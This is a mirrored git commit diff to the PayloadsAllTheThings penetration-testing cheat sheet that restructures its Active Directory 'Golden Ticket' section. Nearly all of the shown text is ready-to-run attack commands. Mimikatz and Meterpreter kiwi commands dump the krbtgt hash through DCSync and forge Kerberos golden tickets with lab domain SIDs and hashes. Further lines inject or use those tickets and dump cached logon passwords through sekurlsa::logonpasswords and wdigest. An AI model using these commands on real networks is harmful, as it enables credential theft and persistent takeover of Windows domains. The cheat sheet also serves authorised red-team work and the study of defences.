mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-24 13:25:27 +00:00
Fix Golden Ticket
This commit is contained in:
parent
b8fbca3347
commit
f62d466340
@ -45,25 +45,30 @@
|
|||||||
Metasploit : windows/gather/credentials/domain_hashdump
|
Metasploit : windows/gather/credentials/domain_hashdump
|
||||||
```
|
```
|
||||||
* Golden Tickets
|
* Golden Tickets
|
||||||
|
Mimikatz version
|
||||||
```c
|
```c
|
||||||
Get info - Mimikatz
|
Get info - Mimikatz
|
||||||
lsadump::dcsync /user:krbtgt
|
lsadump::dcsync /user:krbtgt
|
||||||
lsadump::lsa /inject /name:krbtgt
|
lsadump::lsa /inject /name:krbtgt
|
||||||
|
|
||||||
Get info - Meterpreter(kiwi)
|
|
||||||
dcsync_ntlm krbtgt
|
|
||||||
|
|
||||||
Forge a Golden ticket - Mimikatz
|
Forge a Golden ticket - Mimikatz
|
||||||
kerberos::golden /user:evil /domain:pentestlab.local /sid:S-1-5-21-3737340914-2019594255-2413685307 /krbtgt:d125e4f69c851529045ec95ca80fa37e /ticket:evil.tck /ptt
|
kerberos::golden /user:evil /domain:pentestlab.local /sid:S-1-5-21-3737340914-2019594255-2413685307 /krbtgt:d125e4f69c851529045ec95ca80fa37e /ticket:evil.tck /ptt
|
||||||
kerberos::tgt
|
kerberos::tgt
|
||||||
|
```
|
||||||
|
|
||||||
Forge a Golden ticket - Metasploit
|
Meterpreter version
|
||||||
post/windows/escalate/golden_ticket
|
```c
|
||||||
|
Get info - Meterpreter(kiwi)
|
||||||
|
dcsync_ntlm krbtgt
|
||||||
|
dcsync krbtgt
|
||||||
|
|
||||||
Forge a Golden ticket - Meterpreter
|
Forge a Golden ticket - Meterpreter
|
||||||
load kiwi
|
load kiwi
|
||||||
|
golden_ticket_create -d <domainname> -k <nthashof krbtgt> -s <SID without le RID> -u <user_for_the_ticket> -t <location_to_store_tck>
|
||||||
golden_ticket_create -d pentestlab.local -u pentestlabuser -s S-1-5-21-3737340914-2019594255-2413685307 -k d125e4f69c851529045ec95ca80fa37e -t /root/Downloads/pentestlabuser.tck
|
golden_ticket_create -d pentestlab.local -u pentestlabuser -s S-1-5-21-3737340914-2019594255-2413685307 -k d125e4f69c851529045ec95ca80fa37e -t /root/Downloads/pentestlabuser.tck
|
||||||
|
kerberos_ticket_purge
|
||||||
kerberos_ticket_use /root/Downloads/pentestlabuser.tck
|
kerberos_ticket_use /root/Downloads/pentestlabuser.tck
|
||||||
|
kerberos_ticket_list
|
||||||
```
|
```
|
||||||
* Kerberoast
|
* Kerberoast
|
||||||
```c
|
```c
|
||||||
@ -87,6 +92,7 @@
|
|||||||
```
|
```
|
||||||
load mimikatz
|
load mimikatz
|
||||||
mimikatz_command -f sekurlsa::logonPasswords full
|
mimikatz_command -f sekurlsa::logonPasswords full
|
||||||
|
mimikatz_command -f sekurlsa::wdigest
|
||||||
```
|
```
|
||||||
|
|
||||||
## PowerSploit
|
## PowerSploit
|
||||||
|
@ -13,6 +13,7 @@ Mimikatz console (multiple commands)
|
|||||||
PS C:\temp\mimikatz> .\mimikatz
|
PS C:\temp\mimikatz> .\mimikatz
|
||||||
mimikatz # privilege::debug
|
mimikatz # privilege::debug
|
||||||
mimikatz # sekurlsa::logonpasswords
|
mimikatz # sekurlsa::logonpasswords
|
||||||
|
mimikatz # sekurlsa::wdigest
|
||||||
```
|
```
|
||||||
|
|
||||||
Mimikatz Golden ticket
|
Mimikatz Golden ticket
|
||||||
|
Loading…
Reference in New Issue
Block a user